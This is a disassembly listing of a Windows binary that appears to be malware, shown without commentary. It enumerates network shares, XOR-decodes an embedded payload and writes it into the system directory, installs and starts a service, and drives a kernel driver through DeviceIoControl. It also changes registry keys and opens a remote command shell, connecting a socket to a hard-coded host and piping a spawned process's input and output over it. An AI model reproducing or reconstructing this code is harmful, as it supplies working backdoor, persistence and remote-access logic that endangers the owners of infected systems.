call [ __import_lookup_table_3(MSVCRT:strstr) ]
add esp 0x8
mov esi eax
cmp esi ebp
push 0x5c
je r-xdata
mov ecx [ rw-data ]
mov esi [ __import_lookup_table_3(MSVCRT:strrchr) ]
push ecx
call esi
add esp 0x8
cmp eax ebp
je r-xdata
lea ecx [ esi + 0x3 ]
push ecx
call [ __import_lookup_table_3(MSVCRT:strchr) ]
mov edi eax
add esp 0x8
cmp edi ebp
je r-xdata
mov [ esp + 0x4d ] 0x0
mov ebx 0x6
mov [ eax ] 0x0
mov ecx [ rw-data ]
cmp eax ecx
je r-xdata
lea edx [ edi + 0x1 ]
push 0x5c
push edx
call [ __import_lookup_table_3(MSVCRT:strchr) ]
add esp 0x8
test eax eax
je r-xdata
lea edx [ esp + 0x18 ]
lea eax [ esp + 0x24 ]
push edx
push eax
push ebp
push ebp
push edi
call WNetOpenEnumA
test eax eax
jne r-xdata
push 0x5c
push ecx
call esi
add esp 0x8
cmp eax ebp
je r-xdata
inc esi
mov [ edi ] 0x0
mov [ esp + 0x38 ] esi
mov edi 0x2
jmp r-xdata
lea edi [ esi + 0x1 ]
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi [ rw-data ]
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
call sub_4039b0
pop edi
pop esi
pop ebp
pop ebx
add esp 0x4038
retn
mov ecx [ esp + 0x10 ]
push ecx
push 0x40
call [ GlobalAlloc@IAT ]
mov esi eax
mov [ esp + 0x20 ] esi
mov edx [ rw-data ]
lea ecx [ eax + 0x1 ]
cmp edx edi
mov [ esp + 0x38 ] ecx
jne r-xdata
push esi
call [ GlobalFree@IAT ]
mov edx [ esp + 0x18 ]
push edx
call WNetCloseEnum
cmp ebx 0x5
jne r-xdata
mov eax [ esp + 0x14 ]
mov [ esp + 0x1c ] ebp
cmp eax ebp
jbe r-xdata
cmp eax [ rw-data ]
jne r-xdata
lea eax [ esp + 0x44 ]
lea ecx [ esp + 0x4d ]
push eax
lea edx [ ebx - 0x5 ]
push ecx
lea eax [ esp + 0x55 ]
push edx
push eax
mov [ esp + 0x59 ] ebx
call sub_402910
lea ecx [ esp + 0x58 ]
push ebx
push ecx
call sub_401f50
add esp 0x18
pop edi
pop esi
pop ebp
pop ebx
add esp 0x4038
retn
mov ecx [ esp + 0x10 ]
xor eax eax
mov edx ecx
mov edi esi
shr ecx 0x2
[ edi ]
mov ecx edx
and ecx 0x3
[ edi ]
mov edx [ esp + 0x18 ]
lea eax [ esp + 0x10 ]
push eax
lea ecx [ esp + 0x18 ]
push esi
push ecx
push edx
call WNetEnumResourceA
cmp eax ebp
jne r-xdata
lea ebp [ esi + 0x14 ]
mov [ esp + 0x2c ] 0x6
mov [ esp + 0x30 ] 0x80000002
mov [ esp + 0x40 ] ecx
mov eax [ esp + 0x1c ]
mov ecx [ esp + 0x14 ]
inc eax
add ebp 0x20
cmp eax ecx
mov [ esp + 0x1c ] eax
jb r-xdata
cmp [ ebp - 0x10 ] 0x1
jne r-xdata
mov eax [ ebp ]
test eax eax
je r-xdata
xor ebp ebp
jmp r-xdata
mov edi [ ebp ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + ebx + 0x48 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
mov edi [ ebp ]
or ecx 0xffffffff
[ edi ]
not ecx
mov esi [ esp + 0x20 ]
dec ecx
lea ebx [ ebx + ecx + 0x1 ]
mov ecx [ ebp - 0xc ]
mov [ esp + ebx + 0x48 ] ecx
add ebx 0x4
add eax 0x2
push 0x5c
push eax
call [ __import_lookup_table_3(MSVCRT:strchr) ]
add esp 0x8
test eax eax
je r-xdata
inc eax
mov [ ebp ] eax
sub_404cb0
sub esp 0xe14
push ebx
push esi
push edi
mov ecx 0x180
mov esi rw-data
lea edi [ esp + 0x81c ]
[ edi ] [ esi ]
mov eax [ rw-data ]
mov ecx [ rw-data ]
mov edx [ rw-data ]
mov [ esp + 0xc ] eax
lea eax [ esp + 0x1c ]
push 0x400
push eax
mov [ esp + 0x18 ] ecx
movsb [ edi ] [ esi ]
mov [ esp + 0x1c ] edx
call [ __import_lookup_table_0(KERNEL32:GetSystemDirectoryA) ]
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x1c ]
[ edi ]
not ecx
sub edi ecx
push eax
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea edx [ esp + 0x20 ]
and ecx 0x3
push 0x2
[ edi ] [ esi ]
lea edi [ esp + 0x14 ]
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
push 0x2
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
push eax
push eax
and ecx 0x3
lea eax [ esp + 0x30 ]
push 0x40000000
[ edi ] [ esi ]
push eax
call [ __import_lookup_table_0(KERNEL32:CreateFileA) ]
mov esi eax
cmp esi 0xffffffff
je r-xdata
pop edi
pop esi
pop ebx
add esp 0xe14
retn
lea ecx [ esp + 0x18 ]
push 0x0
push ecx
lea edx [ esp + 0x824 ]
push 0x601
push edx
push esi
call [ WriteFile@IAT ]
push esi
mov edi eax
call [ CloseHandle@IAT ]
test edi edi
je r-xdata
lea eax [ esp + 0x41c ]
push 0x3ff
push eax
push 0x0
call [ GetModuleFileNameA@IAT ]
lea edi [ esp + 0xc ]
or ecx 0xffffffff
xor eax eax
mov [ esp + 0x13 ] 0x20
mov [ esp + 0x14 ] 0x0
lea edx [ esp + 0x1c ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
lea edx [ esp + 0x1c ]
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x41c ]
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea eax [ esp + 0x1c ]
and ecx 0x3
push eax
[ edi ] [ esi ]
call sub_404e40
add esp 0x4
push 0x1
call [ ExitProcess@IAT ]
sub_404e40
sub esp 0x254
push ebp
mov ebp [ esp + 0x25c ]
push esi
push edi
push rw-data
push ebp
call [ __import_lookup_table_3(MSVCRT:strstr) ]
add esp 0x8
test eax eax
jne r-xdata
mov ecx 0x11
xor eax eax
lea edi [ esp + 0x1c ]
lea edx [ esp + 0x1c ]
[ edi ]
lea ecx [ esp + 0xc ]
mov [ esp + 0x48 ] 0x1
push ecx
push edx
push eax
push eax
push eax
push eax
push eax
push eax
push ebp
push eax
mov [ esp + 0x74 ] ax
call [ CreateProcessA@IAT ]
pop edi
pop esi
pop ebp
add esp 0x254
retn
mov edi ebp
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
lea edx [ esp + 0x60 ]
mov eax ecx
mov esi edi
mov edi edx
push 0x22
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
mov esi [ __import_lookup_table_3(MSVCRT:strchr) ]
lea ecx [ esp + 0x64 ]
push ecx
call esi
add esp 0x8
test eax eax
je r-xdata
inc eax
push 0x22
push eax
call esi
add esp 0x8
test eax eax
je r-xdata
lea edx [ esp + 0x60 ]
push 0x5c
push edx
mov [ eax ] 0x0
call [ __import_lookup_table_3(MSVCRT:strrchr) ]
add esp 0x8
test eax eax
je r-xdata
cmp [ eax - 0x1 ] 0x3a
jne r-xdata
mov [ eax ] 0x0
mov [ eax + 0x1 ] 0x0
jmp r-xdata
lea eax [ esp + 0x61 ]
push eax
call [ SetCurrentDirectoryA@IAT ]
sub_404f20
push ecx
mov [ rw-data ] 0x4f
call sub_403d70
mov eax [ rw-data ]
test eax eax
jne r-xdata
pop ecx
retn
lea eax [ esp ]
push eax
push 0x0
push 0x0
push sub_404f50
push 0x0
push 0x0
call [ __import_lookup_table_0(KERNEL32:CreateThread) ]
sub_404f50
mov eax 0x1538
call sub_405c40
push ebx
mov eax 0x1
push ebp
push esi
mov esi [ CreatePipe@IAT ]
xor ebp ebp
mov [ rw-data ] eax
mov [ esp + 0x2c ] eax
push edi
lea eax [ esp + 0x28 ]
push ebp
lea ecx [ esp + 0x28 ]
push eax
lea edx [ esp + 0x20 ]
or ebx 0xffffffff
push ecx
push edx
mov [ esp + 0x20 ] ebp
mov [ esp + 0x24 ] ebx
mov [ esp + 0x38 ] 0xc
mov [ esp + 0x3c ] ebp
call esi
lea eax [ esp + 0x28 ]
push ebp
lea ecx [ esp + 0x24 ]
push eax
lea edx [ esp + 0x24 ]
push ecx
push edx
call esi
mov ecx 0x11
xor eax eax
lea edi [ esp + 0x4c ]
mov edx [ rw-data ]
[ edi ]
mov eax [ esp + 0x1c ]
mov ecx [ rw-data ]
mov [ esp + 0x84 ] eax
mov eax [ esp + 0x24 ]
mov [ esp + 0x8c ] eax
mov [ esp + 0x88 ] eax
mov [ esp + 0x34 ] ecx
lea eax [ esp + 0x3c ]
lea ecx [ esp + 0x4c ]
push eax
push ecx
push ebp
push ebp
push ebp
mov [ esp + 0x4c ] edx
push 0x1
push ebp
lea edx [ esp + 0x50 ]
push ebp
push edx
push ebp
mov [ esp + 0xa0 ] 0x101
mov [ esp + 0xa4 ] bp
call [ CreateProcessA@IAT ]
push 0x3e8
call [ __import_lookup_table_0(KERNEL32:Sleep) ]
call sub_405310
mov ebp eax
test ebp ebp
je r-xdata
mov edx [ esp + 0x3c ]
push 0x0
push edx
call [ TerminateProcess@IAT ]
pop edi
pop esi
pop ebp
mov [ rw-data ] 0x0
mov eax 0x1
pop ebx
add esp 0x1538
retn 0x4
mov eax [ rw-data ]
lea edx [ esp + 0x90 ]
test eax eax
mov edi rw-data
jne r-xdata
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x90 ]
or ecx 0xffffffff
[ edi ]
not ecx
add ecx 0x3
push ecx
mov ecx [ rw-data ]
push 0x1
push rw-data
push 0xdfe5
push ecx
call [ inet_ntoa@IAT ]
lea edx [ esp + 0x1a0 ]
push eax
push edx
call sub_402570
lea edi [ esp + 0x1a8 ]
or ecx 0xffffffff
xor eax eax
add esp 0x18
[ edi ]
not ecx
dec ecx
lea edi [ esp + 0x90 ]
mov edx ecx
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
lea edi [ esp + 0x90 ]
mov [ esp + edx + 0x190 ] ecx
or ecx 0xffffffff
add edx 0x4
lea esi [ esp + 0x90 ]
[ edi ]
not ecx
dec ecx
lea edi [ esp + edx + 0x190 ]
mov eax ecx
push 0x0
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x94 ]
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
add ecx edx
push ecx
lea ecx [ esp + 0x198 ]
push ecx
push ebp
call [ send@IAT ]
mov esi [ __import_lookup_table_0(KERNEL32:Sleep) ]
push 0x64
mov edi rw-data
test ebx ebx
jg r-xdata
mov ecx [ esp + 0x18 ]
lea edx [ esp + 0x10 ]
push 0x0
push edx
push eax
lea eax [ esp + 0xd54 ]
push eax
push ecx
call [ ReadFile@IAT ]
test eax eax
je r-xdata
cmp ebx 0x7ff
mov eax 0x7ff
ja r-xdata
push ebp
call sub_402830
add esp 0x4
test eax eax
je r-xdata
push ebp
call [ closesocket@IAT ]
mov eax [ rw-data ]
test eax eax
je r-xdata
push 0x0
lea ecx [ esp + 0xd4c ]
push eax
push ecx
push ebp
call [ recv@IAT ]
test eax eax
jle r-xdata
mov eax ebx
cmp eax 0xffffffff
je r-xdata
mov edx [ esp + 0x10 ]
mov eax [ rw-data ]
add edx 0x4
push edx
push 0x1
push rw-data
push 0xdfe5
push eax
call [ inet_ntoa@IAT ]
lea ecx [ esp + 0x1a0 ]
push eax
push ecx
call sub_402570
lea edi [ esp + 0x1a8 ]
or ecx 0xffffffff
xor eax eax
add esp 0x18
[ edi ]
mov eax [ esp + 0x10 ]
lea esi [ esp + 0xd48 ]
not ecx
dec ecx
mov ebx ecx
mov ecx eax
mov edx ecx
mov [ esp + ebx + 0x190 ] eax
add ebx 0x4
shr ecx 0x2
lea edi [ esp + ebx + 0x190 ]
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
add ebx eax
[ edi ] [ esi ]
push ebp
mov [ esp + 0x18 ] 0xffffffff
call [ closesocket@IAT ]
push 0x64
call esi
call sub_405310
mov ebp eax
test ebp ebp
je r-xdata
mov ecx [ esp + 0x20 ]
lea edx [ esp + 0x10 ]
push 0x0
push edx
sub ebx eax
push eax
lea eax [ esp + 0xd54 ]
mov [ esp + 0x20 ] ebx
push eax
push ecx
call [ WriteFile@IAT ]
test eax eax
je r-xdata
cmp eax 0x3e800
jge r-xdata
sub ebx eax
test ebx ebx
jg r-xdata
push 0xa
jmp r-xdata
push ebp
call sub_4053b0
add esp 0x4
cmp eax 0xffffffff
mov [ esp + 0x14 ] eax
je r-xdata
push 0x0
lea eax [ esp + 0x194 ]
push ebx
push eax
push ebp
call [ send@IAT ]
test eax eax
jl r-xdata
push 0xa
call [ __import_lookup_table_0(KERNEL32:Sleep) ]
mov esi [ __import_lookup_table_0(KERNEL32:Sleep) ]
mov ebx [ esp + 0x14 ]
jmp r-xdata
call esi
mov ebx eax
mov ecx [ esp + 0x18 ]
push 0x0
lea edx [ esp + 0x14 ]
push 0x0
push edx
lea eax [ esp + 0xd54 ]
push 0x800
push eax
push ecx
call [ __import_lookup_table_0(KERNEL32:PeekNamedPipe) ]
mov eax [ esp + 0x10 ]
test eax eax
je r-xdata
sub_405310
sub esp 0x10
push ebx
push esi
push edi
mov edi [ rw-data ]
push 0x0
push 0x1
push 0x2
mov ebx 0xdfe5
call [ socket@IAT ]
mov esi eax
cmp esi 0xffffffff
jne r-xdata
mov eax [ rw-data ]
test eax eax
je r-xdata
pop edi
pop esi
xor eax eax
pop ebx
add esp 0x10
retn
push ebx
mov [ esp + 0x10 ] 0x2
call [ htons@IAT ]
mov [ esp + 0xe ] ax
lea eax [ esp + 0xc ]
push 0x10
push eax
push esi
mov [ esp + 0x1c ] edi
call [ connect@IAT ]
test eax eax
je r-xdata
mov eax [ rw-data ]
test eax eax
je r-xdata
mov eax esi
pop edi
pop esi
pop ebx
add esp 0x10
retn
push esi
call [ closesocket@IAT ]
pop edi
pop esi
xor eax eax
pop ebx
add esp 0x10
retn
push rw-data
call [ inet_addr@IAT ]
mov ebx [ rw-data ]
mov edi eax
sub_4053b0
mov ecx [ esp + 0x4 ]
sub esp 0x10
lea eax [ esp ]
push 0x0
push 0x4
push eax
push ecx
call [ recv@IAT ]
cmp eax 0x4
je r-xdata
mov eax [ esp ]
add esp 0x10
retn
or eax 0xffffffff
add esp 0x10
retn
sub_4053e0
push ecx
push esi
push edi
push 0x3e800
mov esi 0x5
call [ __import_lookup_table_3(MSVCRT:malloc) ]
mov edi eax
add esp 0x4
test edi edi
je r-xdata
lea ecx [ esp + 0x8 ]
lea eax [ edi + 0x5 ]
push ecx
lea edx [ esi - 0x5 ]
push eax
push edx
push eax
mov [ edi + 0x1 ] esi
call sub_402910
push esi
push edi
call sub_401f50
push edi
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x1c
pop edi
pop esi
pop ecx
retn
lea eax [ edi + 0x5 ]
mov [ edi ] 0x61
push eax
mov eax [ rw-data ]
mov edx [ eax ]
lea ecx [ eax + 0x4 ]
push ecx
push edx
call sub_405590
lea esi [ eax + 0x5 ]
mov [ esp + 0x14 ] eax
mov [ edi + esi ] 0x1
inc esi
lea eax [ edi + esi ]
push eax
mov eax [ rw-data ]
mov edx [ eax ]
lea ecx [ eax + 0x4 ]
push ecx
push edx
call sub_405610
add esp 0x18
mov [ esp + 0x8 ] eax
add esi eax
sub_405470
push esi
mov esi [ rw-data ]
push edi
or ecx 0xffffffff
lea edx [ esi + 0x4 ]
xor eax eax
mov edi edx
[ edi ]
not ecx
dec ecx
lea eax [ ecx + edx + 0x1 ]
push eax
mov eax [ esi ]
push edx
push eax
call sub_4057b0
add esp 0xc
neg eax
sbb al al
and al 0xa
add al 0x45
mov [ rw-data ] al
call sub_403d70
pop edi
pop esi
retn
sub_4054b0
push ebx
mov ebx [ rw-data ]
push esi
push edi
lea edx [ ebx + 0x4 ]
or ecx 0xffffffff
mov edi edx
xor eax eax
[ edi ]
not ecx
dec ecx
lea esi [ ecx + edx + 0x1 ]
or ecx 0xffffffff
mov edi esi
[ edi ]
not ecx
dec ecx
lea eax [ ecx + esi + 0x1 ]
mov ecx [ ecx + esi + 0x5 ]
push ecx
lea ecx [ eax + 0x8 ]
mov eax [ eax ]
push ecx
mov ecx [ ebx ]
push eax
push esi
push edx
push ecx
call sub_405750
add esp 0x18
neg eax
sbb al al
and al 0xa
add al 0x45
mov [ rw-data ] al
call sub_403d70
pop edi
pop esi
pop ebx
retn
sub_405510
push esi
mov esi [ rw-data ]
push edi
or ecx 0xffffffff
lea edx [ esi + 0x4 ]
xor eax eax
mov edi edx
[ edi ]
not ecx
dec ecx
lea eax [ ecx + edx + 0x1 ]
push eax
mov eax [ esi ]
push edx
push eax
call sub_4056b0
add esp 0xc
neg eax
sbb al al
and al 0xa
add al 0x45
mov [ rw-data ] al
call sub_403d70
pop edi
pop esi
retn
sub_405550
push esi
mov esi [ rw-data ]
push edi
or ecx 0xffffffff
lea edx [ esi + 0x4 ]
xor eax eax
mov edi edx
[ edi ]
not ecx
dec ecx
lea eax [ ecx + edx + 0x1 ]
push eax
mov eax [ esi ]
push edx
push eax
call sub_405700
add esp 0xc
neg eax
sbb al al
and al 0xa
add al 0x45
mov [ rw-data ] al
call sub_403d70
pop edi
pop esi
retn
sub_405590
mov ecx [ esp + 0x8 ]
mov edx [ esp + 0x4 ]
push ebx
lea eax [ esp + 0xc ]
push esi
xor esi esi
push eax
push 0xf003f
push esi
push ecx
push edx
xor ebx ebx
call [ RegOpenKeyExA@IAT ]
test eax eax
je r-xdata
push ebp
mov ebp [ esp + 0x18 ]
push edi
pop esi
xor eax eax
pop ebx
retn
mov edx [ esp + 0x18 ]
push edx
call [ RegCloseKey@IAT ]
pop edi
mov eax esi
pop ebp
pop esi
pop ebx
retn
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
inc ebx
lea esi [ esi + ecx + 0x1 ]
jmp r-xdata
mov ecx [ esp + 0x18 ]
push 0x0
push 0x0
push 0x0
lea eax [ esp + 0x20 ]
lea edi [ esi + ebp ]
push 0x0
push eax
push edi
push ebx
push ecx
mov [ esp + 0x34 ] 0x104
call [ RegEnumKeyExA@IAT ]
test eax eax
jne r-xdata
sub_405610
mov ecx [ esp + 0x8 ]
mov edx [ esp + 0x4 ]
push ebx
lea eax [ esp + 0x8 ]
push esi
xor esi esi
push eax
push 0xf003f
push esi
push ecx
push edx
xor ebx ebx
call [ RegOpenKeyExA@IAT ]
test eax eax
je r-xdata
push ebp
mov ebp [ __import_lookup_table_1(ADVAPI32:RegEnumValueA) ]
push edi
mov edi [ esp + 0x1c ]
pop esi
xor eax eax
pop ebx
retn
mov edx [ esp + 0x14 ]
push edx
call [ RegCloseKey@IAT ]
pop edi
mov eax esi
pop ebp
pop esi
pop ebx
retn
mov eax [ esp + 0x18 ]
inc ebx
mov [ esi + edi + 0x104 ] eax
mov ecx [ esp + 0x18 ]
lea esi [ esi + ecx + 0x108 ]
jmp r-xdata
lea eax [ esp + 0x18 ]
lea ecx [ edi + esi + 0x108 ]
push eax
lea edx [ edi + esi + 0x100 ]
push ecx
push edx
mov edx [ esp + 0x20 ]
lea eax [ esp + 0x28 ]
push 0x0
lea ecx [ esi + edi ]
push eax
push ecx
push ebx
push edx
mov [ esp + 0x3c ] 0x100
mov [ esp + 0x38 ] 0x2800
call ebp
test eax eax
jne r-xdata
sub_4056b0
mov ecx [ esp + 0x8 ]
mov edx [ esp + 0x4 ]
lea eax [ esp + 0x8 ]
push eax
push 0xf003f
push 0x0
push ecx
push edx
call [ RegOpenKeyExA@IAT ]
test eax eax
je r-xdata
mov eax [ esp + 0xc ]
mov ecx [ esp + 0x8 ]
push esi
push eax
push ecx
call [ __import_lookup_table_4(SHLWAPI:SHDeleteKeyA) ]
mov edx [ esp + 0xc ]
mov esi eax
push edx
call [ RegCloseKey@IAT ]
xor eax eax
test esi esi
sete al
pop esi
retn
xor eax eax
retn
sub_405700
mov ecx [ esp + 0x8 ]
mov edx [ esp + 0x4 ]
lea eax [ esp + 0x8 ]
push eax
push 0xf003f
push 0x0
push ecx
push edx
call [ RegOpenKeyExA@IAT ]
test eax eax
je r-xdata
mov eax [ esp + 0xc ]
mov ecx [ esp + 0x8 ]
push esi
push eax
push ecx
call [ __import_lookup_table_1(ADVAPI32:RegDeleteValueA) ]
mov edx [ esp + 0xc ]
mov esi eax
push edx
call [ RegCloseKey@IAT ]
xor eax eax
test esi esi
sete al
pop esi
retn
xor eax eax
retn
sub_405750
mov ecx [ esp + 0x8 ]
mov edx [ esp + 0x4 ]
lea eax [ esp + 0x8 ]
push eax
push 0xf003f
push 0x0
push ecx
push edx
call [ RegOpenKeyExA@IAT ]
test eax eax
je r-xdata
mov eax [ esp + 0x18 ]
mov ecx [ esp + 0x14 ]
mov edx [ esp + 0x10 ]
push esi
push eax
mov eax [ esp + 0x14 ]
push ecx
mov ecx [ esp + 0x14 ]
push edx
push 0x0
push eax
push ecx
call [ RegSetValueExA@IAT ]
mov edx [ esp + 0xc ]
mov esi eax
push edx
call [ RegCloseKey@IAT ]
xor eax eax
test esi esi
sete al
pop esi
retn
xor eax eax
retn
sub_4057b0
mov ecx [ esp + 0x8 ]
mov edx [ esp + 0x4 ]
lea eax [ esp + 0x8 ]
push eax
push 0xf003f
push 0x0
push ecx
push edx
call [ RegOpenKeyExA@IAT ]
test eax eax
je r-xdata
mov ecx [ esp + 0xc ]
push esi
mov edx [ esp + 0xc ]
push edi
lea eax [ esp + 0xc ]
push 0x0
push eax
push 0x0
push 0xf003f
push 0x0
push 0x0
push 0x0
push ecx
push edx
call [ __import_lookup_table_1(ADVAPI32:RegCreateKeyExA) ]
mov edi [ RegCloseKey@IAT ]
mov esi eax
mov eax [ esp + 0x10 ]
push eax
call edi
mov ecx [ esp + 0xc ]
push ecx
call edi
xor eax eax
pop edi
test esi esi
sete al
pop esi
retn
xor eax eax
retn
sub_405820
mov eax 0x15a0
call sub_405c40
mov eax [ rw-data ]
push esi
cmp eax 0x1
push edi
jne r-xdata
mov ecx 0x4e0
mov esi rw-data
lea edi [ esp + 0x224 ]
push ebx
[ edi ] [ esi ]
movsb [ edi ] [ esi ]
xor eax eax
push rw-data
call [ __import_lookup_table_0(KERNEL32:LoadLibraryA) ]
mov edi eax
test edi edi
je r-xdata
mov bl [ esp + eax + 0x228 ]
xor bl 0x53
mov [ esp + eax + 0x228 ] bl
inc eax
cmp eax 0x1380
jb r-xdata
lea eax [ esp + 0x28 ]
push 0x200
push eax
call [ __import_lookup_table_0(KERNEL32:GetSystemDirectoryA) ]
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x28 ]
[ edi ]
not ecx
sub edi ecx
push rw-data
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea edx [ esp + 0x2c ]
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea eax [ esp + 0x2c ]
and ecx 0x3
push eax
[ edi ] [ esi ]
call [ __import_lookup_table_3(MSVCRT:fopen) ]
add esp 0x8
mov esi eax
test esi esi
pop ebx
je r-xdata
pop edi
pop esi
add esp 0x15a0
retn
push rw-data
push edi
call [ __import_lookup_table_0(KERNEL32:GetProcAddress) ]
mov esi eax
test esi esi
je r-xdata
push esi
push 0x1380
lea ecx [ esp + 0x22c ]
push 0x1
push ecx
call [ fwrite@IAT ]
push esi
call [ fclose@IAT ]
lea edx [ esp + 0x38 ]
push rw-data
push edx
push rw-data
call sub_405a90
add esp 0x20
test eax eax
je r-xdata
push edi
call [ FreeLibrary@IAT ]
pop edi
pop esi
add esp 0x15a0
retn
push 0x1
call [ __import_lookup_table_0(KERNEL32:GetCurrentProcessId) ]
push eax
call esi
push rw-data
mov [ esp + 0x10 ] 0xca68
mov [ esp + 0x14 ] 0xfa10
mov [ esp + 0x18 ] 0xdfe5
call sub_402a00
mov esi [ inet_addr@IAT ]
add esp 0x4
push eax
call esi
push rw-data
mov [ esp + 0x1c ] eax
call sub_402a00
add esp 0x4
push eax
call esi
mov ecx [ rw-data ]
mov [ esp + 0x1c ] eax
lea eax [ esp + 0x8 ]
mov esi [ __import_lookup_table_0(KERNEL32:DeviceIoControl) ]
push 0x0
push eax
push 0x0
push 0x0
push 0x0
push 0x0
push 0x82010018
push ecx
call esi
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x8 ]
[ edi ]
mov eax [ rw-data ]
push 0x0
push edx
push 0x0
not ecx
push 0x0
push ecx
push rw-data
push 0x82010008
push eax
call esi
lea ecx [ esp + 0x8 ]
push 0x0
push ecx
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
mov edx [ rw-data ]
push 0x0
not ecx
push 0x0
push ecx
push rw-data
push 0x8201000c
push edx
call esi
mov edx [ rw-data ]
lea eax [ esp + 0x8 ]
push 0x0
push eax
push 0x0
push 0x0
lea ecx [ esp + 0x1c ]
push 0x18
push ecx
push 0x82010010
push edx
call esi
lea eax [ esp + 0x8 ]
push 0x0
push eax
mov edi rw-data
or ecx 0xffffffff
xor eax eax
push 0x0
push 0x0
[ edi ]
not ecx
push ecx
mov ecx [ rw-data ]
push rw-data
push 0x82010014
push ecx
call esi
sub_405a90
push esi
push edi
push 0xf003f
push 0x0
push 0x0
call [ OpenSCManagerA@IAT ]
mov edi [ esp + 0xc ]
mov esi eax
mov eax [ esp + 0x10 ]
push eax
push edi
push esi
call sub_405b10
push edi
push esi
call sub_405b70
mov ecx [ esp + 0x28 ]
push ecx
push edi
call sub_405bc0
add esp 0x1c
mov edi eax
push esi
call [ CloseHandle@IAT ]
mov eax edi
pop edi
pop esi
retn
sub_405ae0
push ecx
mov ecx [ rw-data ]
lea eax [ esp ]
push 0x0
push eax
push 0x0
push 0x0
push 0x0
push 0x0
push 0x8201001c
push ecx
call [ __import_lookup_table_0(KERNEL32:DeviceIoControl) ]
mov eax 0x1
pop ecx
retn
sub_405b10
mov eax [ esp + 0xc ]
push esi
push 0x0
push 0x0
push 0x0
mov ecx [ esp + 0x14 ]
push 0x0
push 0x0
push eax
mov eax [ esp + 0x24 ]
push 0x1
push 0x3
push 0x1
push 0xf01ff
push eax
push eax
push ecx
call [ CreateServiceA@IAT ]
mov esi eax
test esi esi
jne r-xdata
push esi
call [ CloseServiceHandle@IAT ]
mov eax 0x1
pop esi
retn
call [ __import_lookup_table_0(KERNEL32:GetLastError) ]
cmp eax 0x431
je r-xdata
xor eax eax
pop esi
retn
sub_405b70
mov eax [ esp + 0x8 ]
mov ecx [ esp + 0x4 ]
push esi
push 0xf01ff
push eax
push ecx
call [ __import_lookup_table_1(ADVAPI32:OpenServiceA) ]
mov esi eax
test esi esi
jne r-xdata
push 0x0
push 0x0
push esi
call [ __import_lookup_table_1(ADVAPI32:StartServiceA) ]
test eax eax
jne r-xdata
pop esi
retn
push esi
call [ CloseServiceHandle@IAT ]
mov eax 0x1
pop esi
retn
call [ __import_lookup_table_0(KERNEL32:GetLastError) ]
cmp eax 0x420
je r-xdata
xor eax eax
pop esi
retn
sub_405bc0
mov eax [ esp + 0x4 ]
sub esp 0x80
lea ecx [ esp ]
push eax
push rw-data
push ecx
call [ __import_lookup_table_3(MSVCRT:sprintf) ]
add esp 0xc
lea edx [ esp ]
push 0x0
push 0x80
push 0x3
push 0x0
push 0x0
push 0xc0000000
push edx
call [ __import_lookup_table_0(KERNEL32:CreateFileA) ]
cmp eax 0xffffffff
jne r-xdata
mov ecx [ esp + 0x88 ]
mov [ ecx ] eax
mov eax 0x1
add esp 0x80
retn
xor eax eax
add esp 0x80
retn
sub_405c40
push ecx
cmp eax 0x1000
lea ecx [ esp + 0x8 ]
jb r-xdata
sub ecx eax
mov eax esp
test [ ecx ] eax
mov esp ecx
mov ecx [ eax ]
mov eax [ eax + 0x4 ]
push eax
retn
sub ecx 0x1000
sub eax 0x1000
test [ ecx ] eax
cmp eax 0x1000
jae r-xdata
_start
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x68
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
xor ebx ebx
mov [ ebp - 0x4 ] ebx
push 0x2
call [ __set_app_type@IAT ]
pop ecx
or [ rw-data ] 0xffffffff
or [ rw-data ] 0xffffffff
